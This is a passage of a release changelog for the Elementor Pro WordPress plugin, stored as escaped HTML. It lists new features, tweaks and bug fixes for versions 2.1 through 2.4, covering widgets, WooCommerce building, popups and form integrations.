href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7443\\\">#7443<\\/a>)<\\/li>\\n<li>Tweak: Added responsive support to WC Products Columns & Rows Gap controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6913\\\">#6913<\\/a>)<\\/li>\\n<li>Tweak: WC Menu cart "View Cart" & "Checkout" buttons styling<\\/li>\\n<li>Fix: Custom ID reset to default when dragging repeater<\\/li>\\n<li>Fix: Conflict between archive-products widget and WC customizer<\\/li>\\n<li>Fix: Add to Cart widget <code>spacing<\\/code> and <code>space-between<\\/code><\\/li>\\n<li>Fix: Library view when creating a new Header or Footer<\\/li>\\n<li>Fix: Post types labels missing on Add New Template modal<\\/li>\\n<\\/ul>\\n<h4>2.4.8 - 2019-03-11<\\/h4>\\n<ul>\\n<li>Fix: Missing query section in Products widget<\\/li>\\n<li>Fix: Missing Taxonomy controls in Products widget in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.7 - 2019-03-06<\\/h4>\\n<ul>\\n<li>Fix: Compatibility Global Widget with Elementor v2.5.0+<\\/li>\\n<\\/ul>\\n<h4>2.4.6 - 2019-03-04<\\/h4>\\n<ul>\\n<li>Fix: Pods gallery dynamic when empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7127\\\">#7127<\\/a>)<\\/li>\\n<li>Fix: Duplicate call for conditions screen issue<\\/li>\\n<li>Fix: Compatibility with Elementor v2.5.0<\\/li>\\n<\\/ul>\\n<h4>2.4.5 - 2019-02-18<\\/h4>\\n<ul>\\n<li>Fix: Image size issue in Testimonial Carousel (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7058\\\">#7058<\\/a>)<\\/li>\\n<li>Fix: MailChimp groups not saved in a form integration (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7083\\\">#7083<\\/a>)<\\/li>\\n<li>Fix: Show popup preview only on it\'s own preview<\\/li>\\n<li>Fix: Elementor dashboard templates URL corrupted links in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.4.4 - 2019-02-11<\\/h4>\\n<ul>\\n<li>Tweak: Added ACF Date Time Picker field support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6690\\\">#6690<\\/a>)<\\/li>\\n<li>Tweak: Changed the term of <code>All Posts<\\/code> condition to <code>Posts<\\/code><\\/li>\\n<li>Fix: Added <code><IfModule><\\/code> to avoid 500 error when <code>mod-headers<\\/code> is missing (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7034\\\">#7034<\\/a>)<\\/li>\\n<li>Fix: Include post CSS deletion in Global Widget update (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6856\\\">#6856<\\/a>)<\\/li>\\n<li>Fix: <code>Textarea<\\/code> default value in Forms Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6934\\\">#6934<\\/a>)<\\/li>\\n<li>Fix: MailPoet latest version caused fatal error (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6996\\\">#6996<\\/a>)<\\/li>\\n<li>Fix: Fatal Error caused by calling MailPoet deleted method<\\/li>\\n<li>Notice: MailPoet <code>Auto Confirm<\\/code> option will now default to "On"<\\/li>\\n<\\/ul>\\n<h4>2.4.3 - 2019-01-30<\\/h4>\\n<ul>\\n<li>Fix: Custom Add to Cart widget responsive alignment settings<\\/li>\\n<li>Fix: Links in Post Info widget<\\/li>\\n<li>Fix: WooCommerce <code>View Cart<\\/code> string translate<\\/li>\\n<li>Fix: Wrapper classes for header\\/footer templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6884\\\">#6884<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.4.2 - 2019-01-25<\\/h4>\\n<ul>\\n<li>Tweak: Added pixel units to Close Button position control in Popups<\\/li>\\n<li>Fix: Exclude error in WC Products widget<\\/li>\\n<\\/ul>\\n<h4>2.4.1 - 2019-01-24<\\/h4>\\n<ul>\\n<li>Tweak: Added CSS classes control to Popup (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6826\\\">#6826<\\/a>)<\\/li>\\n<li>Tweak: Added responsive image size to Testimonial Carousel widget<\\/li>\\n<li>Fix: PHP warning when Toolset Date dynamic is empty (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6842\\\">#6842<\\/a>)<\\/li>\\n<li>Fix: Support of exclude-ids in WC Products widget<\\/li>\\n<li>Fix: Popup close button not clickable<\\/li>\\n<li>Fix: Alignment justify issue of Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6749\\\">#6749<\\/a>)<\\/li>\\n<li>Fix: Bad anchors breaks the page JS<\\/li>\\n<li>Fix: Popup overlay shown when turned off<\\/li>\\n<\\/ul>\\n<h4>2.4.0 - 2019-01-21<\\/h4>\\n<ul>\\n<li>New: Introducing Popup Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/628\\\">#628<\\/a>)<\\/li>\\n<li>New: Added <code>Popup<\\/code> Dynamic Tag<\\/li>\\n<li>New: Added <code>Popup<\\/code> forms action after submit<\\/li>\\n<li>New: Added User Info dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6322\\\">#6322<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities for "Nothing Found" message<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/theme_builder\\/archive\\/escape_nothing_found_message<\\/code> Filter to avoid HTML escaping in "Nothing Found" message (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6053\\\">#6053<\\/a>)<\\/li>\\n<li>Tweak: Added <code>add_doc_to_location<\\/code> method to Allow insertion of a document to a location<\\/li>\\n<li>Fix: <code>z-index<\\/code> issue with CTA widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6486\\\">#6486<\\/a>)<\\/li>\\n<li>Fix: Hide the Post Content widget and show it only in a Single document<\\/li>\\n<li>Fix: <code>selector<\\/code> replacement in Custom CSS<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> on the real content only<\\/li>\\n<li>Fix: CSS for WC products selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6559\\\">#6559<\\/a>)<\\/li>\\n<li>Fix: Odnoklassniki share URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6638\\\">#6638<\\/a>)<\\/li>\\n<li>Fix: Custom link new tab in Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5766\\\">#5766<\\/a>)<\\/li>\\n<li>Fix: <code>nofollow<\\/code> link in Flip Box & CTA widgets<\\/li>\\n<li>Fix: Post Terms in Post Info widget<\\/li>\\n<li>Fix: Added screen reader to some icons & buttons for better accessibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5386\\\">#5386<\\/a>)<\\/li>\\n<li>Fix: Accessibility labels in Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6630\\\">#6630<\\/a>)<\\/li>\\n<li>Fix: Link to cart page not working when WooCommerce Subscriptions is active<\\/li>\\n<li>Fix: MailChimp Selected list not showing on reloading in Form widget<\\/li>\\n<li>Fix: Sub-menu arrow position in Nav Menu widget<\\/li>\\n<li>Fix: Conflict with WP Security Audit Log plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6648\\\">#6648<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.3.1 - 2018-12-19<\\/h4>\\n<ul>\\n<li>Fix: Template widget search functionality (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6473\\\">#6473<\\/a>)<\\/li>\\n<li>Fix: Apply <code>the_content<\\/code> filter to post content in theme builder<\\/li>\\n<\\/ul>\\n<h4>2.3.0 - 2018-12-17<\\/h4>\\n<ul>\\n<li>New: Introducing Discord Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4218\\\">#4218<\\/a>)<\\/li>\\n<li>New: Introducing Slack Integration for Forms<\\/li>\\n<li>New: Introducing MailerLite Integration for Forms (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4462\\\">#4462<\\/a>)<\\/li>\\n<li>New: Activate Elementor Pro plugin by connecting to Elementor account<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/utils\\/get_public_post_types<\\/code> filter hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5900\\\">#5900<\\/a>)<\\/li>\\n<li>Tweak: Added <code>loop_start<\\/code> & <code>the_content<\\/code> hooks for Post Content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6173\\\">#6173<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from Page Settings<\\/li>\\n<li>Tweak: Always add the Custom CSS control to the Advanced tab<\\/li>\\n<li>Fix: In sub Term condition false positive in edge cases<\\/li>\\n<li>Fix: ToolSet Dynamic Image fallback<\\/li>\\n<li>Fix: Style glitch with the dropdown color in Nav Menu widget<\\/li>\\n<li>Fix: Style glitch in the Conditions screen in Safari browser<\\/li>\\n<li>Fix: Ribbon in the CTA widget obscures drop down menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6080\\\">#6080<\\/a>)<\\/li>\\n<li>Fix: The color of label won\'t change color in Widget login<\\/li>\\n<\\/ul>\\n<h4>2.2.5 - 2018-12-11<\\/h4>\\n<ul>\\n<li>New: Add Style Tab & Custom CSS for Header & Footer Templates.<\\/li>\\n<li>Tweak: Added a better identifier for subpages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6362\\\">#6362<\\/a>)<\\/li>\\n<li>Tweak: Removed Custom Attributes from page settings<\\/li>\\n<li>Fix: Yahoo event URL date issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Allow timezone settings in Google event URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6354\\\">#6354<\\/a>)<\\/li>\\n<li>Fix: Avoid <code>z-index<\\/code> changes by <code>nanocss<\\/code> in build process<\\/li>\\n<li>Fix: Added missing WC upsells products CSS<\\/li>\\n<li>Fix: Nav Menu dropdown losing color on hover<\\/li>\\n<li>Fix: WC Product Add-ons CSS compatibility<\\/li>\\n<\\/ul>\\n<h4>2.2.4 - 2018-12-04<\\/h4>\\n<ul>\\n<li>Fix: Global widget not saving changes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6340\\\">#6340<\\/a>)<\\/li>\\n<li>Fix: Dynamic tags support in Blockquote widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6334\\\">#6334<\\/a>)<\\/li>\\n<li>Fix: Forms Redirect URL action when using form field values with spaces<\\/li>\\n<\\/ul>\\n<h4>2.2.3 - 2018-11-29<\\/h4>\\n<ul>\\n<li>Fix: Missing "Edit Template" in Template widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Follow menu anchors with UTF8 characters in Nav Menu<\\/li>\\n<li>Fix: Show only supported templates in Template widget<\\/li>\\n<li>Fix: Revert conflicting fix for a default order for WC archive<\\/li>\\n<\\/ul>\\n<h4>2.2.2 - 2018-11-28<\\/h4>\\n<ul>\\n<li>Fix: Lightbox dynamic tag crashes the editor<\\/li>\\n<\\/ul>\\n<h4>2.2.1 - 2018-11-28<\\/h4>\\n<ul>\\n<li>New: Added <code>ACF File<\\/code> Dynamic tag to support text controls.<\\/li>\\n<li>Tweak: Added option to hide item count bubble when cart is empty in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6223\\\">#6223<\\/a>)<\\/li>\\n<li>Tweak: Added Actions group for Lightbox and Contact URL tags<\\/li>\\n<li>Tweak: Added filter <code>elementor_pro\\/dynamic_tags\\/shortcode\\/should_escape<\\/code> to avoid escaping in Shortcode dynamic tag<\\/li>\\n<li>Tweak: MailPoet3 integration allow Subscriber to to subscribe to multiple lists<\\/li>\\n<li>Tweak: Added front-end max file size validation for upload fields<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> per Post-Type condition for theme builder<\\/li>\\n<li>Fix: Template widget panel not showing the selected template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6271\\\">#6271<\\/a>)<\\/li>\\n<li>Fix: Conflict between ACF with Safari browser on Select option in Dynamic tag<\\/li>\\n<li>Fix: Add post classes only for the Single template<\\/li>\\n<li>Fix: Set document type as not editable for unsupported document like Global widget<\\/li>\\n<li>Fix: Avoid duplicate query for current WC product query<\\/li>\\n<li>Fix: Product Archive showing oldest products instead of latest<\\/li>\\n<li>Fix: CSS reset in Posts widget using cards skin<\\/li>\\n<\\/ul>\\n<h4>2.2.0 - 2018-11-19<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/290\\\">#290<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3990\\\">#3990<\\/a>)<\\/li>\\n<li>New: Added evergreen option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4459\\\">#4459<\\/a>)<\\/li>\\n<li>New: Added expire actions option for Countdown widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5242\\\">#5242<\\/a>)<\\/li>\\n<li>New: Introducing Reviews widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3854\\\">#3854<\\/a>)<\\/li>\\n<li>New: Introducing Sitemap widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5594\\\">#5594<\\/a>)<\\/li>\\n<li>New: Added Request Parameter dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4934\\\">#4934<\\/a>)<\\/li>\\n<li>New: Added Shortcode dynamic tag<\\/li>\\n<li>New: Added Image and Video Lightbox dynamic tag<\\/li>\\n<li>New: Added Contact URL dynamic tag<\\/li>\\n<li>New: Added Featured Image Data dynamic tag<\\/li>\\n<li>New: Added default value to each field in the Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4268\\\">#4268<\\/a>)<\\/li>\\n<li>New: Added "Any Child Of" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5321\\\">#5321<\\/a>)<\\/li>\\n<li>New: Added "In Child" condition to template conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5587\\\">#5587<\\/a>)<\\/li>\\n<li>Tweak: Added Form Redirect URL with form values (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2564\\\">#2564<\\/a>)<\\/li>\\n<li>Tweak: Added default post classes to template wrapper (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5959\\\">#5959<\\/a>)<\\/li>\\n<li>Tweak: Better labels for terms in Query control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6092\\\">#6092<\\/a>)<\\/li>\\n<li>Tweak: Renamed "Child Of" templates condition to "Direct Child Of"<\\/li>\\n<li>Tweak: Added <code>elementor\\/theme\\/get_location_templates\\/condition_sub_id<\\/code> filter hook to allow template condition translations<\\/li>\\n<li>Tweak: Load the Template Library widget via Ajax for better performance<\\/li>\\n<li>Tweak: Added 404 page title for Page Title dynamic tag<\\/li>\\n<li>Fix: Menu Cart Toggle has # URL link (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6141\\\">#6141<\\/a>)<\\/li>\\n<li>Fix: Alignment issue in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5790\\\">#5790<\\/a>)<\\/li>\\n<li>Fix: Avoid potential security risk in forms<\\/li>\\n<li>Fix: Template By Author condition conflicts with 404 page<\\/li>\\n<li>Fix: Restored WC Product Content widget in Single Product template<\\/li>\\n<li>Fix: Theme Builder Preview URLs for date archives and 404 pages<\\/li>\\n<li>Fix: Highlight active menu anchor items only when scrolled into view<\\/li>\\n<li>Fix: Carousel Pagination Progress style to support new Swiper version<\\/li>\\n<\\/ul>\\n<h4>2.1.13 - 2018-11-12<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for new brand Finder in v2.3.0<\\/li>\\n<li>Fix: Settings conflict when there are multiple carousels in the page<\\/li>\\n<\\/ul>\\n<h4>2.1.12 - 2018-11-05<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.3<\\/li>\\n<li>Tweak: Better performance for Template Library widget<\\/li>\\n<li>Fix: Fatal error if a taxonomy used in a dynamic field is removed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6029\\\">#6029<\\/a>)<\\/li>\\n<li>Fix: Date Time dynamic tag now respect site language (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6001\\\">#6001<\\/a>)<\\/li>\\n<li>Fix: Custom CSS printed twice in the front-end<\\/li>\\n<li>Fix: ACF Image field PHP warning (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6051\\\">#6051<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.1.11 - 2018-10-22<\\/h4>\\n<ul>\\n<li>New: Added ACF local fields compatibility<\\/li>\\n<li>Tweak: Re-brand TypeKit by Adobe Fonts integration<\\/li>\\n<li>Fix: Exclude <code>is_embed<\\/code> from Singular condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5915\\\">#5915<\\/a>)<\\/li>\\n<li>Fix: Avoid conflict with Ad Blockers and Share Buttons<\\/li>\\n<li>Fix: Current date time dynamic tag now shows local time<\\/li>\\n<li>Fix: Avoid conflict with 3rd party plugins that filter the permalink<\\/li>\\n<li>Fix: Avoid PHP warning when no groups are selected for MailChimp integration<\\/li>\\n<li>Fix: Avoid PHP warning if checkbox field is empty for ACF<\\/li>\\n<li>Fix: Respect password protected for a WC single product template<\\/li>\\n<li>Fix: Respect <code>order<\\/code> settings for WC archive also without pagination<\\/li>\\n<\\/ul>\\n<h4>2.1.10 - 2018-10-09<\\/h4>\\n<ul>\\n<li>Tweak: Added responsive alignment control for Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5821\\\">#5821<\\/a>)<\\/li>\\n<li>Tweak: Added link control to Animated Headline widget<\\/li>\\n<li>Fix: Mobile nav menu jump on RTL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5711\\\">#5711<\\/a>)<\\/li>\\n<li>Fix: Responsive alignment control in Add to Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5830\\\">#5830<\\/a>)<\\/li>\\n<li>Fix: Added IE compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Post Content widget is now shown only on <code>Single<\\/code> templates<\\/li>\\n<li>Fix: Query Control Pagination with offset<\\/li>\\n<\\/ul>\\n<h4>2.1.9 - 2018-09-17<\\/h4>\\n<ul>\\n<li>Tweak: Added Centered Slides option for Slideshow carousel<\\/li>\\n<li>Fix: Allow only public CPT for Manual Selection in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5091\\\">#5091<\\/a>)<\\/li>\\n<li>Fix: ACF Gallery option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: Page scrolling on resize when sticky is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5740\\\">#5740<\\/a>)<\\/li>\\n<li>Fix: Edit custom name for Global Widget in the Navigator (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5689\\\">#5689<\\/a>)<\\/li>\\n<li>Fix: Coverflow transition effect in Carousel<\\/li>\\n<li>Fix: Weird mobile behavior with Cube effect in Carousel<\\/li>\\n<li>Fix: Show the first thumbnail in the Slideshow carousel correctly<\\/li>\\n<\\/ul>\\n<h4>2.1.8 - 2018-09-12<\\/h4>\\n<ul>\\n<li>Tweak: Added styling options for WC Additional Information widget<\\/li>\\n<li>Tweak: Added styling options for \'View Cart\' link in Products widget<\\/li>\\n<li>Fix: 3rd party plugin support for WC single product template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5338\\\">#5338<\\/a>)<\\/li>\\n<li>Fix: Layout of Related Product widget with WC native style<\\/li>\\n<\\/ul>\\n<h4>2.1.7 - 2018-09-03<\\/h4>\\n<ul>\\n<li>New: WC Archive Description widget<\\/li>\\n<li>Tweak: Added blend mode to Slides widget background overlay (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5555\\\">#5555<\\/a>)<\\/li>\\n<li>Tweak: Added \'Current Subcategories\' option to Product Categories widget<\\/li>\\n<li>Fix: Added default vertical alignment in Author Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5589\\\">#5589<\\/a>)<\\/li>\\n<li>Tweak: Added more blend mode options for CTA widget<\\/li>\\n<li>Tweak: Improved plugin updater method based on WordPress version<\\/li>\\n<li>Fix: Improved IE compatibility for Posts and Portfolio widgets<\\/li>\\n<li>Fix: Added default gap for products pagination<\\/li>\\n<li>Fix: Post thumbnail flickering in Safari browser<\\/li>\\n<li>Fix: Close mobile nav menu on click only in full-width mode<\\/li>\\n<li>Fix: Added trailing slash to pagination links in Posts widget<\\/li>\\n<\\/ul>\\n<h4>2.1.6 - 2018-08-28<\\/h4>\\n<ul>\\n<li>New: WC Product Category Image widget and Dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5117\\\">#5117<\\/a>)<\\/li>\\n<li>Tweak: Allow HTML in Excerpt widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5491\\\">#5491<\\/a>)<\\/li>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Tweak: Deprecated Follow option in the Facebook Button widget<\\/li>\\n<li>Fix: Posts widget grid in Safari & IE11 (Depended on Elementor v2.2)<\\/li>\\n<li>Fix: Posts widget CSS when using cards skin in masonry mode<\\/li>\\n<li>Fix: ACF Image & ACF URL option support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5344\\\">#5344<\\/a>)<\\/li>\\n<li>Fix: WC product gallery links in RTL<\\/li>\\n<li>Fix: Dynamic tags in Call To Action widget<\\/li>\\n<\\/ul>\\n<h4>2.1.5 - 2018-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.2<\\/li>\\n<li>Fix: Posts Widget layout theme compatibility<\\/li>\\n<li>Fix: Added compatibility for WooCommerce native style<\\/li>\\n<\\/ul>\\n<h4>2.1.4 - 2018-08-19<\\/h4>\\n<ul>\\n<li>Fix: Layout issue compatibility with themes caused by v2.1 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5442\\\">#5442<\\/a>)<\\/li>\\n<li>Fix: Dynamic setting in Pricing Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5460\\\">#5460<\\/a>)<\\/li>\\n<li>Fix: Hide Target URL control if is not necessary in Blockquote widget<\\/li>\\n<li>Fix: Selector specificity for WooCommerce Products widget<\\/li>\\n<li>Fix: WooCommerce conflicts in the editor in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.3 - 2018-08-15<\\/h4>\\n<ul>\\n<li>Fix: Thumbnails in the Posts widget jumping (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5350\\\">#5350<\\/a>)<\\/li>\\n<li>Fix: Responsive grid in the Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5375\\\">#5375<\\/a>)<\\/li>\\n<li>Fix: Added missing <code>setup_postdata<\\/code> for Product Data Tabs widget<\\/li>\\n<li>Fix: Rollback to older version of Flip Box widget to resolve 3D depth issue (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5399\\\">#5399<\\/a>)<\\/li>\\n<li>Fix: Allowed types in the Upload File field are now case-insensitive (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5254\\\">#5254<\\/a>)<\\/li>\\n<li>Fix: Carousel behavior when using a single slide<\\/li>\\n<\\/ul>\\n<h4>2.1.2 - 2018-08-12<\\/h4>\\n<ul>\\n<li>Fix: Error when ACF Pro is not installed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5367\\\">#5367<\\/a>)<\\/li>\\n<li>Fix: Edge cases in Inspector where document is a boolean<\\/li>\\n<li>Fix: Edge cases for incorrect file fields in PODS<\\/li>\\n<\\/ul>\\n<h4>2.1.1 - 2018-08-09<\\/h4>\\n<ul>\\n<li>Fix: Highlighted text in Animated Headline widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5345\\\">#5345<\\/a>)<\\/li>\\n<li>Fix: Flip Box effect issues<\\/li>\\n<li>Fix: ACF Options page fields support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5329\\\">#5329<\\/a>)<\\/li>\\n<li>Fix: Import Pro templates in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.1.0 - 2018-08-07<\\/h4>\\n<ul>\\n<li>New: Introducing WooCommerce Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1690\\\">#1690<\\/a>)<\\/li>\\n<li>New: Introducing 12 new dynamic tags & widgets for WooCommerce: Gallery, Image, Price, Rating, Description, Breadcrumbs, Data Tabs, Stock, Related, Upsell, Title & Archive<\\/li>\\n<li>New: Introducing Cart Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4220\\\">#4220<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4600\\\">#4600<\\/a>)<\\/li>\\n<li>New: Added integration with Toolset (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2949\\\">#2949<\\/a>)<\\/li>\\n<li>New: Added integration with Pods (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4129\\\">#4129<\\/a>)<\\/li>\\n<li>New: Added stick to bottom in scrolling effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4799\\\">#4799<\\/a>)<\\/li>\\n<li>New: Added Scrolling Effect to Widgets under advanced tab<\\/li>\\n<li>New: Introducing Internal URL Dynamic Tag<\\/li>\\n<li>Tweak: Added a Last Updated Date in the Post Info widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4597\\\">#4597<\\/a>)<\\/li>\\n<li>Tweak: Added Redirect after Logout option for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4447\\\">#4447<\\/a>)<\\/li>\\n<li>Tweak: Avoid repeating posts when using more than one in the Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1878\\\">#1878<\\/a>)<\\/li>\\n<li>Tweak: Add Custom Query hook for Query control (<a href=\\\"https:\\/\\/developers.elementor.com\\/custom-query-filter\\/\\\">More Info<\\/a>) (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1748\\\">#1748<\\/a>)<\\/li>\\n<li>Tweak: Added form-message style (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for button on the Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4242\\\">#4242<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag for Call to action widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4767\\\">#4767<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic Tags support for Google Map field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4602\\\">#4602<\\/a>)<\\/li>\\n<li>Tweak: Added an support for <code>label|value<\\/code> in options field (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4594\\\">#4594<\\/a>)<\\/li>\\n<li>Tweak: Added <code>by-author<\\/code> condition for theme builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4681\\\">#4681<\\/a>)<\\/li>\\n<li>Tweak: Added Activate\\/Deactivate license key via WP-CLI command (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4149\\\">#4149<\\/a>)<\\/li>\\n<li>Tweak: Added <code>is_scroll<\\/code> trigger to scrolling effect (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4340\\\">#4340<\\/a>)<\\/li>\\n<li>Tweak: Added In Same Term support for Post Navigation widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4177\\\">#4177<\\/a>)<\\/li>\\n<li>Tweak: Added responsive control for Slides To Scroll control in all carousel 